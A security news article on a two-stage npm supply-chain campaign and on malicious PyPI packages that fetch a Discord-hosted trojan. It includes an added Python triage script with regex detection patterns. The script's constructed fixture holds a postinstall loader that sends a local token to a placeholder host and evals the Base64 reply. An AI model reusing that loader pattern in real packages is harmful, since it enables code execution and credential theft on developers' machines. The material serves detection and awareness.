
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns

Security researchers with Phylum have uncovered an ongoing campaign that targets the npm ecosystem. The campaign, initially detected on June 11, utilizes a pair of published packages that work in tandem to fetch additional harmful resources.

How do packages work?

According to the supply chain security firm, the campaign only succeeds if the two packages are installed in a particular order.
  • The first package is designed to obtain a token from a remote server and store it locally.
  • The second package sends this token to the remote server to retrieve a further script.
  • The server answers with a Base64-encoded string, "bm8gaGlzdG9yeSBhdmFpbGFibGU=", and the second package executes the fetched content only if its length exceeds 100 characters.

However, the researchers found that the endpoint has so far consistently returned this string, which decodes to "no history available."
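As an added illustration (not code from Phylum or from this article), the following Python checks the observed response against the length gate described above and then flags the two-stage install pattern in an unpacked npm package. The indicator regexes, the `.token` file name, the placeholder host and both fixture packages are assumptions constructed for the example.

```python
import base64
import json
import re

# Response the article reports the stage-two endpoint returning (Base64 of "no history available").
OBSERVED_RESPONSE = "bm8gaGlzdG9yeSBhdmFpbGFibGU="
EXEC_THRESHOLD = 100  # the fetched script is executed only above this length


def stage_two_gate(b64_response: str, threshold: int = EXEC_THRESHOLD) -> tuple:
    """Decode a stage-two response and report whether the length gate would let it run.
    The article does not say whether the check is on the encoded or decoded text; both
    are far below the threshold here, so the outcome is the same either way."""
    decoded = base64.b64decode(b64_response).decode("utf-8", errors="replace")
    return decoded, max(len(b64_response), len(decoded)) > threshold


# Heuristic indicators of the two-stage pattern: install-time hook, remote fetch, a token
# read from or written to disk, Base64 decoding and dynamic execution of the result.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
INDICATORS = {
    "remote_fetch": re.compile(r"https?\.get\(|\bfetch\(|require\(['\"]axios['\"]\)"),
    "token_on_disk": re.compile(r"(writeFileSync|readFileSync)\([^)]*token", re.I),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\("),
    "dynamic_exec": re.compile(r"\beval\(|new Function\(|child_process|\bvm\.run"),
}


def triage_npm_package(files: dict) -> dict:
    """files maps filename -> contents of an unpacked package; returns which indicators hit."""
    manifest = json.loads(files.get("package.json", "{}"))
    hooks = {k: v for k, v in manifest.get("scripts", {}).items() if k in LIFECYCLE_HOOKS}
    text = "\n".join(list(hooks.values()) + [v for k, v in files.items() if k != "package.json"])
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["lifecycle_hook"] = bool(hooks)
    return hits


# Constructed fixtures (not the real packages): a stage-two loader with a placeholder host
# that mirrors the behaviour described above, and a benign library for comparison.
STAGE_TWO = {
    "package.json": json.dumps({"name": "example-stage-two", "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": "const fs=require('fs'),https=require('https');\n"
                "const token=fs.readFileSync('.token','utf8');\n"
                "https.get('https://stage2.example.invalid/?t='+token,(r)=>{let d='';r.on('data',c=>d+=c);\n"
                "r.on('end',()=>{if(d.length>100)eval(Buffer.from(d,'base64').toString());});});\n",
}
BENIGN = {
    "package.json": json.dumps({"name": "example-benign", "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (a, b) => a + b;\n",
}
```

Running `stage_two_gate(OBSERVED_RESPONSE)` shows why the payload never executed, and the triage function scores the constructed loader on all five indicators while the benign package hits none.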

What does it mean?

  • This result suggests either that the attack technique is still under development or that delivery of the malicious payload has been scheduled for a later time.
  • Another possibility is that the token generated by the first package depends on the IP address from which the request is sent, so only selected victims receive the real payload.

The researchers have not attributed the attack to any specific threat actor but highlighted that it is a carefully orchestrated supply chain attack initiative. Moreover, the attackers have employed dynamic delivery methods for the subsequent payload to evade detection.

There are PyPI packages too

Cybersecurity firm Sonatype has further uncovered six malicious packages on the PyPI repository, uploaded by an account named "broke."
  • The identified packages are broke-rcl, brokescolors, brokescolors2, brokescolors3, brokesrcl, and trexcolors; all of them target the Windows platform.
  • Upon installation, they download and execute a trojan hosted on Discord servers.
  • The firm also disclosed one package, named "libiobe", that targets both Windows and Linux platforms.

The bottom line

The emergence of malicious packages in the npm and PyPI ecosystems emphasizes the need for heightened vigilance and robust security measures against the risks such packages pose. Developers, package maintainers, and users must remain diligent in verifying the integrity and authenticity of packages before installation.
Cyware Publisher
